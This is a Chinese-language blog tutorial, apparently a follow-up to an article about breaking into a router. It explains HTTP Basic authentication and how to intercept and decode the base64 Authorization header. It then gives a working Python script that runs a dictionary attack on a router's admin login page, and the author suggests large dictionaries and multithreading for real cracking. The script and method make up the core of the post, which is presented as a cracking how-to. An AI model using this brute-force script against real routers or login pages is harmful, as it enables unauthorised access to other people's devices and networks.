http://daily.zhihu.com/story/3603866?utm_campaign=in_app_share&utm_medium=Android
先看看上面的那个文章
------------
Evi1m0大牛破解了路由器的连接密码之后,又破解了路由器的管理登陆密码,这个过程就是一笔带过,在这里详细的说一下。
首先说什么是http basic认证
在HTTP协议进行通信的过程中,HTTP协议定义了基本认证过程以允许HTTP服务器对WEB浏览器进行用户身份证的方法,当一个客户端向HTTP服务 器进行数据请求时,如果客户端未被认证,则HTTP服务器将通过基本认证过程对客户端的用户名及密码进行验证,以决定用户是否合法。客户端在接收到HTTP服务器的身份认证要求后,会提示用户输入用户名及密码,然后将用户名及密码以BASE64加密,加密后的密文将附加于请求信息中, 如当用户名为anjuta,密码为:123456时,客户端将用户名和密码用“:”合并,并将合并后的字符串用BASE64加密为密文,并于每次请求数据 时,将密文附加于请求头(Request Header)中。HTTP服务器在每次收到请求包后,根据协议取得客户端附加的用户信息(BASE64加密的用户名和密码),解开请求包,对用户名及密码进行验证,如果用 户名及密码正确,则根据客户端请求,返回客户端所需要的数据;否则,返回错误代码或重新要求客户端提供用户名及密码。
我们先抓包看看http头是什么样的。
我使用的是firefox + tamper data,首先是安装这个插件。
https://addons.mozilla.org/zh-CN/firefox/addon/tamper-data/?src=search
安装之后,按alt,就能显示菜单栏了,工具 -- tamper data,
开路由器的登录网址,我的是http://192.168.1.253
点击上面的start tamper,然后输入账号密码,
点击tamper,拦截这个请求,然后可以看到
看到Authorization这个了吧,后面跟的明显是base64编码的内容,我们解码看看
这就是我们的账号密码中间加一个冒号,然后base64编码。
基本原理明白了,我们就可以去写程序破解了。
找一个账号密码字典,然后编码,加到http头,就是这个easy。
#coding:utf-8 import base64 import urllib2 password_dic = [["root", "root"], ["admin", "admin"], ["admin", "rootroot"]] request = urllib2.Request('http://192.168.1.253') #request.add_header('Authorization', 'Basic YWRtaW46cm9vdHJvb3Q=') for item in password_dic: psw_base64 = "Basic " + base64.b64encode(item[0] + ":" + item[1]) request.add_header('Authorization', psw_base64) try: response = urllib2.urlopen(request) print "Correct! Username: %s, password: %s" % (item[0], item[1]) break except urllib2.HTTPError: print "Error!"
使用了python自带的urllib2,上面password_dic就是自己随便写的,真正去破解的话,有很大的字典呢,而且多线程去跑。
request.add_header('Authorization', psw_base64)
就将我们构造的账号密码的http头加进去了。
看到了吧,最后破解出密码就是admin-rootroot。(你来攻击我啊~)